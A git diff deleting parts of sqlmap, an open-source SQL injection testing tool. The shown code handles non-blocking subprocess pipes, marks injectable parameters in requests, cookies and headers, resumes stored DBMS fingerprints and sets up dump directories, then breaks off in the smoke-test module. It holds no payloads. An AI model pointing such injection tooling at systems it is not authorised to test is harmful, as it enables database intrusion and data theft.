- elif maxsize < 1: - maxsize = 1 - return getattr(self, which), maxsize - - def _close(self, which): - getattr(self, which).close() - setattr(self, which, None) - - if subprocess.mswindows: - def send(self, input): - if not self.stdin: - return None - - try: - x = msvcrt.get_osfhandle(self.stdin.fileno()) - (errCode, written) = WriteFile(x, input) - except ValueError: - return self._close('stdin') - except (subprocess.pywintypes.error, Exception), why: - if why[0] in (109, errno.ESHUTDOWN): - return self._close('stdin') - raise - - return written - - def _recv(self, which, maxsize): - conn, maxsize = self.get_conn_maxsize(which, maxsize) - if conn is None: - return None - - try: - x = msvcrt.get_osfhandle(conn.fileno()) - (read, nAvail, nMessage) = PeekNamedPipe(x, 0) - if maxsize < nAvail: - nAvail = maxsize - if nAvail > 0: - (errCode, read) = ReadFile(x, nAvail, None) - except (ValueError, NameError): - return self._close(which) - except (subprocess.pywintypes.error, Exception), why: - if why[0] in (109, errno.ESHUTDOWN): - return self._close(which) - raise - - if self.universal_newlines: - read = self._translate_newlines(read) - return read - else: - def send(self, input): - if not self.stdin: - return None - - if not select.select([], [self.stdin], [], 0)[1]: - return 0 - - try: - written = os.write(self.stdin.fileno(), input) - except OSError, why: - if why[0] == errno.EPIPE: # broken pipe - return self._close('stdin') - raise - - return written - - def _recv(self, which, maxsize): - conn, maxsize = self.get_conn_maxsize(which, maxsize) - if conn is None: - return None - - flags = fcntl.fcntl(conn, fcntl.F_GETFL) - if not conn.closed: - fcntl.fcntl(conn, fcntl.F_SETFL, flags | os.O_NONBLOCK) - - try: - if not select.select([conn], [], [], 0)[0]: - return '' - - r = conn.read(maxsize) - if not r: - return self._close(which) - - if self.universal_newlines: - r = self._translate_newlines(r) - return r - finally: - if not conn.closed: - fcntl.fcntl(conn, fcntl.F_SETFL, flags) - -def recv_some(p, t=.1, e=1, tr=5, stderr=0): - if tr < 1: - tr = 1 - x = time.time() + t - y = [] - r = '' - if stderr: - pr = p.recv_err - else: - pr = p.recv - while time.time() < x or r: - r = pr() - if r is None: - break - elif r: - y.append(r) - else: - time.sleep(max((x - time.time()) / tr, 0)) - return ''.join(y) - -def send_all(p, data): - if not data: - return - - while len(data): - sent = p.send(data) - if not isinstance(sent, int): - break - data = buffer(data, sent) diff --git a/lib/core/target.py b/lib/core/target.py deleted file mode 100644 index 286cb278..00000000 --- a/lib/core/target.py +++ /dev/null @@ -1,722 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import functools -import os -import re -import tempfile -import time -import urlparse - -from lib.core.common import Backend -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import hashDBRetrieve -from lib.core.common import intersect -from lib.core.common import normalizeUnicode -from lib.core.common import openFile -from lib.core.common import paramToDict -from lib.core.common import readInput -from lib.core.common import resetCookieJar -from lib.core.common import urldecode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import mergedOptions -from lib.core.data import paths -from lib.core.datatype import InjectionDict -from lib.core.dicts import DBMS_DICT -from lib.core.dump import dumper -from lib.core.enums import HASHDB_KEYS -from lib.core.enums import HTTP_HEADER -from lib.core.enums import HTTPMETHOD -from lib.core.enums import PLACE -from lib.core.enums import POST_HINT -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapSystemException -from lib.core.exception import SqlmapUserQuitException -from lib.core.option import _setDBMS -from lib.core.option import _setKnowledgeBaseAttributes -from lib.core.option import _setAuthCred -from lib.core.settings import ASTERISK_MARKER -from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES -from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR -from lib.core.settings import DEFAULT_GET_POST_DELIMITER -from lib.core.settings import HOST_ALIASES -from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX -from lib.core.settings import JSON_RECOGNITION_REGEX -from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX -from lib.core.settings import MULTIPART_RECOGNITION_REGEX -from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS -from lib.core.settings import REFERER_ALIASES -from lib.core.settings import RESTORE_MERGED_OPTIONS -from lib.core.settings import RESULTS_FILE_FORMAT -from lib.core.settings import SUPPORTED_DBMS -from lib.core.settings import UNENCODED_ORIGINAL_VALUE -from lib.core.settings import UNICODE_ENCODING -from lib.core.settings import UNKNOWN_DBMS_VERSION -from lib.core.settings import URI_INJECTABLE_REGEX -from lib.core.settings import USER_AGENT_ALIASES -from lib.core.settings import XML_RECOGNITION_REGEX -from lib.utils.hashdb import HashDB -from lib.core.xmldump import dumper as xmldumper -from thirdparty.odict.odict import OrderedDict - -def _setRequestParams(): - """ - Check and set the parameters and perform checks on 'data' option for - HTTP method POST. - """ - - if conf.direct: - conf.parameters[None] = "direct connection" - return - - testableParameters = False - - # Perform checks on GET parameters - if conf.parameters.get(PLACE.GET): - parameters = conf.parameters[PLACE.GET] - paramDict = paramToDict(PLACE.GET, parameters) - - if paramDict: - conf.paramDict[PLACE.GET] = paramDict - testableParameters = True - - # Perform checks on POST parameters - if conf.method == HTTPMETHOD.POST and conf.data is None: - logger.warn("detected empty POST body") - conf.data = "" - - if conf.data is not None: - conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method - hintNames = [] - - def process(match, repl): - retVal = match.group(0) - - if not (conf.testParameter and match.group("name") not in conf.testParameter): - retVal = repl - while True: - _ = re.search(r"\\g<([^>]+)>", retVal) - if _: - retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1))) - else: - break - if CUSTOM_INJECTION_MARK_CHAR in retVal: - hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name"))) - return retVal - - if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data: - message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR - message += "'--data'. Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - kb.processUserMarks = not test or test[0] not in ("n", "N") - - if kb.processUserMarks: - kb.testOnlyCustom = True - - if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): - if re.search(JSON_RECOGNITION_REGEX, conf.data): - message = "JSON data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) - conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data) - conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data) - match = re.search(r'(?P[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data) - if match and not (conf.testParameter and match.group("name") not in conf.testParameter): - _ = match.group(2) - _ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _) - _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _) - conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _)) - kb.postHint = POST_HINT.JSON - - elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data): - message = "JSON-like data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) - conf.data = re.sub(r"('(?P[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - conf.data = re.sub(r"('(?P[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.JSON_LIKE - - elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data): - message = "Array-like data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) - conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data) - kb.postHint = POST_HINT.ARRAY_LIKE - - elif re.search(XML_RECOGNITION_REGEX, conf.data): - message = "SOAP/XML data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) - conf.data = re.sub(r"(<(?P[^>]+)( [^<]*)?>)([^<]+)(\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML - - elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data): - message = "Multipart-like data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) - conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.MULTIPART - - if not kb.postHint: - if CUSTOM_INJECTION_MARK_CHAR in conf.data: # later processed - pass - else: - place = PLACE.POST - - conf.parameters[place] = conf.data - paramDict = paramToDict(place, conf.data) - - if paramDict: - conf.paramDict[place] = paramDict - testableParameters = True - else: - if CUSTOM_INJECTION_MARK_CHAR not in conf.data: # in case that no usable parameter values has been found - conf.parameters[PLACE.POST] = conf.data - - kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks - - if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"): - warnMsg = "you've provided target URL without any GET " - warnMsg += "parameters (e.g. www.site.com/article.php?id=1) " - warnMsg += "and without providing any POST parameters " - warnMsg += "through --data option" - logger.warn(warnMsg) - - message = "do you want to try URI injections " - message += "in the target URL itself? [Y/n/q] " - test = readInput(message, default="Y") - - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif not test or test[0] not in ("n", "N"): - conf.url = "%s%s" % (conf.url, CUSTOM_INJECTION_MARK_CHAR) - kb.processUserMarks = True - - for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))): - _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or "" - if CUSTOM_INJECTION_MARK_CHAR in _: - if kb.processUserMarks is None: - lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'} - message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR - message += "'%s'. Do you want to process it? [Y/n/q] " % lut[place] - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - kb.processUserMarks = not test or test[0] not in ("n", "N") - - if kb.processUserMarks: - kb.testOnlyCustom = True - - if "=%s" % CUSTOM_INJECTION_MARK_CHAR in _: - warnMsg = "it seems that you've provided empty parameter value(s) " - warnMsg += "for testing. Please, always use only valid parameter values " - warnMsg += "so sqlmap could be able to run properly" - logger.warn(warnMsg) - - if not kb.processUserMarks: - if place == PLACE.URI: - query = urlparse.urlsplit(value).query - if query: - parameters = conf.parameters[PLACE.GET] = query - paramDict = paramToDict(PLACE.GET, parameters) - - if paramDict: - conf.url = conf.url.split('?')[0] - conf.paramDict[PLACE.GET] = paramDict - testableParameters = True - elif place == PLACE.CUSTOM_POST: - conf.parameters[PLACE.POST] = conf.data - paramDict = paramToDict(PLACE.POST, conf.data) - - if paramDict: - conf.paramDict[PLACE.POST] = paramDict - testableParameters = True - - else: - conf.parameters[place] = value - conf.paramDict[place] = OrderedDict() - - if place == PLACE.CUSTOM_HEADER: - for index in xrange(len(conf.httpHeaders)): - header, value = conf.httpHeaders[index] - if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value): - parts = value.split(CUSTOM_INJECTION_MARK_CHAR) - for i in xrange(len(parts) - 1): - conf.paramDict[place]["%s #%d%s" % (header, i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "%s,%s" % (header, "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))) - conf.httpHeaders[index] = (header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) - else: - parts = value.split(CUSTOM_INJECTION_MARK_CHAR) - - for i in xrange(len(parts) - 1): - name = None - if kb.postHint: - for ending, _ in hintNames: - if parts[i].endswith(ending): - name = "%s %s" % (kb.postHint, _) - break - if name is None: - name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR) - conf.paramDict[place][name] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts))) - - if place == PLACE.URI and PLACE.GET in conf.paramDict: - del conf.paramDict[PLACE.GET] - elif place == PLACE.CUSTOM_POST and PLACE.POST in conf.paramDict: - del conf.paramDict[PLACE.POST] - - testableParameters = True - - if kb.processUserMarks: - for item in ("url", "data", "agent", "referer", "cookie"): - if conf.get(item): - conf[item] = conf[item].replace(CUSTOM_INJECTION_MARK_CHAR, "") - - # Perform checks on Cookie parameters - if conf.cookie: - conf.parameters[PLACE.COOKIE] = conf.cookie - paramDict = paramToDict(PLACE.COOKIE, conf.cookie) - - if paramDict: - conf.paramDict[PLACE.COOKIE] = paramDict - testableParameters = True - - # Perform checks on header values - if conf.httpHeaders: - for httpHeader, headerValue in list(conf.httpHeaders): - # Url encoding of the header values should be avoided - # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value - - if httpHeader.title() == HTTP_HEADER.USER_AGENT: - conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue) - - condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True))) - - if condition: - conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue} - testableParameters = True - - elif httpHeader.title() == HTTP_HEADER.REFERER: - conf.parameters[PLACE.REFERER] = urldecode(headerValue) - - condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True))) - - if condition: - conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue} - testableParameters = True - - elif httpHeader.title() == HTTP_HEADER.HOST: - conf.parameters[PLACE.HOST] = urldecode(headerValue) - - condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True))) - - if condition: - conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue} - testableParameters = True - - else: - condition = intersect(conf.testParameter, [httpHeader], True) - - if condition: - conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders) - conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, CUSTOM_INJECTION_MARK_CHAR)} - conf.httpHeaders = [(header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) for header, value in conf.httpHeaders] - testableParameters = True - - if not conf.parameters: - errMsg = "you did not provide any GET, POST and Cookie " - errMsg += "parameter, neither an User-Agent, Referer or Host header value" - raise SqlmapGenericException(errMsg) - - elif not testableParameters: - errMsg = "all testable parameters you provided are not present " - errMsg += "within the given request data" - raise SqlmapGenericException(errMsg) - - if conf.csrfToken: - if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}): - errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken - errMsg += "found in provided GET, POST, Cookie or header values" - raise SqlmapGenericException(errMsg) - else: - for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE): - for parameter in conf.paramDict.get(place, {}): - if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES): - message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter) - message += "Do you want sqlmap to automatically update it in further requests? [y/N] " - test = readInput(message, default="N") - if test and test[0] in ("y", "Y"): - conf.csrfToken = parameter - break - -def _setHashDB(): - """ - Check and set the HashDB SQLite file for query resume functionality. - """ - - if not conf.hashDBFile: - conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, "session.sqlite") - - if os.path.exists(conf.hashDBFile): - if conf.flushSession: - try: - os.remove(conf.hashDBFile) - logger.info("flushing session file") - except OSError, msg: - errMsg = "unable to flush the session file (%s)" % msg - raise SqlmapFilePathException(errMsg) - - conf.hashDB = HashDB(conf.hashDBFile) - -def _resumeHashDBValues(): - """ - Resume stored data values from HashDB - """ - - kb.absFilePaths = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or kb.absFilePaths - kb.brute.tables = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_TABLES, True) or kb.brute.tables - kb.brute.columns = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_COLUMNS, True) or kb.brute.columns - kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars - kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings - kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable - - kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH) - if kb.errorChunkLength and kb.errorChunkLength.isdigit(): - kb.errorChunkLength = int(kb.errorChunkLength) - else: - kb.errorChunkLength = None - - conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH) - - for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []: - if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \ - injection.parameter in conf.paramDict[injection.place]: - - if not conf.tech or intersect(conf.tech, injection.data.keys()): - if intersect(conf.tech, injection.data.keys()): - injection.data = dict(filter(lambda (key, item): key in conf.tech, injection.data.items())) - - if injection not in kb.injections: - kb.injections.append(injection) - - _resumeDBMS() - _resumeOS() - -def _resumeDBMS(): - """ - Resume stored DBMS information from HashDB - """ - - value = hashDBRetrieve(HASHDB_KEYS.DBMS) - - if not value: - return - - dbms = value.lower() - dbmsVersion = [UNKNOWN_DBMS_VERSION] - _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search(r"\A%s (.*)" % _, dbms, re.I) - - if _: - dbms = _.group(1).lower() - dbmsVersion = [_.group(2)] - - if conf.dbms: - check = True - for aliases, _, _, _ in DBMS_DICT.values(): - if conf.dbms.lower() in aliases and dbms not in aliases: - check = False - break - - if not check: - message = "you provided '%s' as a back-end DBMS, " % conf.dbms - message += "but from a past scan information on the target URL " - message += "sqlmap assumes the back-end DBMS is '%s'. " % dbms - message += "Do you really want to force the back-end " - message += "DBMS value? [y/N] " - test = readInput(message, default="N") - - if not test or test[0] in ("n", "N"): - conf.dbms = None - Backend.setDbms(dbms) - Backend.setVersionList(dbmsVersion) - else: - infoMsg = "resuming back-end DBMS '%s' " % dbms - logger.info(infoMsg) - - Backend.setDbms(dbms) - Backend.setVersionList(dbmsVersion) - -def _resumeOS(): - """ - Resume stored OS information from HashDB - """ - - value = hashDBRetrieve(HASHDB_KEYS.OS) - - if not value: - return - - os = value - - if os and os != 'None': - infoMsg = "resuming back-end DBMS operating system '%s' " % os - logger.info(infoMsg) - - if conf.os and conf.os.lower() != os.lower(): - message = "you provided '%s' as back-end DBMS operating " % conf.os - message += "system, but from a past scan information on the " - message += "target URL sqlmap assumes the back-end DBMS " - message += "operating system is %s. " % os - message += "Do you really want to force the back-end DBMS " - message += "OS value? [y/N] " - test = readInput(message, default="N") - - if not test or test[0] in ("n", "N"): - conf.os = os - else: - conf.os = os - - Backend.setOs(conf.os) - -def _setResultsFile(): - """ - Create results file for storing results of running in a - multiple target mode. - """ - - if not conf.multipleTargets: - return - - if not conf.resultsFP: - conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower()) - try: - conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0) - except (OSError, IOError), ex: - try: - warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex)) - conf.resultsFilename = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")[1] - conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0) - warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename - logger.warn(warnMsg) - except IOError, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) - - conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep) - - logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename) - -def _createFilesDir(): - """ - Create the file directory. - """ - - if not conf.rFile: - return - - conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname - - if not os.path.isdir(conf.filePath): - try: - os.makedirs(conf.filePath, 0755) - except OSError, ex: - tempDir = tempfile.mkdtemp(prefix="sqlmapfiles") - warnMsg = "unable to create files directory " - warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) - - conf.filePath = tempDir - -def _createDumpDir(): - """ - Create the dump directory. - """ - - if not conf.dumpTable and not conf.dumpAll and not conf.search: - return - - conf.dumpPath = paths.SQLMAP_DUMP_PATH % conf.hostname - - if not os.path.isdir(conf.dumpPath): - try: - os.makedirs(conf.dumpPath, 0755) - except OSError, ex: - tempDir = tempfile.mkdtemp(prefix="sqlmapdump") - warnMsg = "unable to create dump directory " - warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) - - conf.dumpPath = tempDir - -def _configureDumper(): - if hasattr(conf, 'xmlFile') and conf.xmlFile: - conf.dumper = xmldumper - else: - conf.dumper = dumper - - conf.dumper.setOutputFile() - -def _createTargetDirs(): - """ - Create the output directory. - """ - - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - try: - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755) - warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH - logger.warn(warnMsg) - except (OSError, IOError), ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") - except Exception, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) - - warnMsg = "unable to create regular output directory " - warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) - logger.warn(warnMsg) - - paths.SQLMAP_OUTPUT_PATH = tempDir - - conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname))) - - if not os.path.isdir(conf.outputPath): - try: - os.makedirs(conf.outputPath, 0755) - except (OSError, IOError), ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") - except Exception, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) - - warnMsg = "unable to create output directory " - warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) - logger.warn(warnMsg) - - conf.outputPath = tempDir - - try: - with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f: - f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname) - f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET)) - if conf.data: - f.write("\n\n%s" % getUnicode(conf.data)) - except IOError, ex: - if "denied" in getUnicode(ex): - errMsg = "you don't have enough permissions " - else: - errMsg = "something went wrong while trying " - errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, getSafeExString(ex)) - - raise SqlmapMissingPrivileges(errMsg) - - _createDumpDir() - _createFilesDir() - _configureDumper() - -def _restoreMergedOptions(): - """ - Restore merged options (command line, configuration file and default values) - that could be possibly changed during the testing of previous target. - """ - - for option in RESTORE_MERGED_OPTIONS: - conf[option] = mergedOptions[option] - -def initTargetEnv(): - """ - Initialize target environment. - """ - - if conf.multipleTargets: - if conf.hashDB: - conf.hashDB.close() - - if conf.cj: - resetCookieJar(conf.cj) - - conf.paramDict = {} - conf.parameters = {} - conf.hashDBFile = None - - _setKnowledgeBaseAttributes(False) - _restoreMergedOptions() - _setDBMS() - - if conf.data: - class _(unicode): - pass - - kb.postUrlEncode = True - - for key, value in conf.httpHeaders: - if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper(): - kb.postUrlEncode = "urlencoded" in value - break - - if kb.postUrlEncode: - original = conf.data - conf.data = _(urldecode(conf.data)) - setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) - kb.postSpaceToPlus = '+' in original - -def setupTargetEnv(): - _createTargetDirs() - _setRequestParams() - _setHashDB() - _resumeHashDBValues() - _setResultsFile() - _setAuthCred() diff --git a/lib/core/testing.py b/lib/core/testing.py deleted file mode 100644 index bef22351..00000000 --- a/lib/core/testing.py +++ /dev/null @@ -1,322 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import doctest -import os -import re -import shutil -import sys -import tempfile -import time -import traceback - -from extra.beep.beep import beep -from lib.controller.controller import start -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import getUnicode -from lib.core.common import randomStr -from lib.core.common import readXmlFile -from lib.core.data import conf -from lib.core.data import logger -from lib.core.data import paths -from lib.core.exception import SqlmapBaseException -from lib.core.exception import SqlmapNotVulnerableException -from lib.core.log import LOGGER_HANDLER -from lib.core.option import init -from lib.core.option import initOptions -from lib.core.option import setVerbosity -from lib.core.optiondict import optDict -from lib.core.settings import UNICODE_ENCODING -from lib.parse.cmdline import cmdLineParser - -class Failures(object): - failedItems = None - failedParseOn = None - failedTraceBack = None - -def smokeTest(): - """ - Runs the basic smoke testing of a program - """ - - retVal = True - count, length = 0, 0 - - for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): - if any(_ in root for _ in ("thirdparty", "extra")): - continue - - for ifile in files: - length += 1 - - for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): - if any(_ in root for _ in ("thirdparty", "extra")): - continue - - for ifile in files: - if os.path.splitext(ifile)[1].lower() == ".py" and ifile != "__init__.py": - path = os.path.join(root, os.path.splitext(ifile)[0]) - path = path.replace(paths.SQLMAP_ROOT_PATH, '.') - path = path.replace(os.sep, '.').lstrip('.') - try: - __import__(path) - module = sys.modules[path] - except Exception, msg: - retVal = False - dataToStdout("\r") - errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, ifile), msg) - logger.error(errMsg) - else: - # Run doc tests - # Reference: http://docs.python.org/library/doctest.html - (failure_count, test_count) = doctest.testmod(module) - if failure_count > 0: - retVal = False - - count += 1 - status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) - dataToStdout("\r[%s] [INFO] complete: %s" % 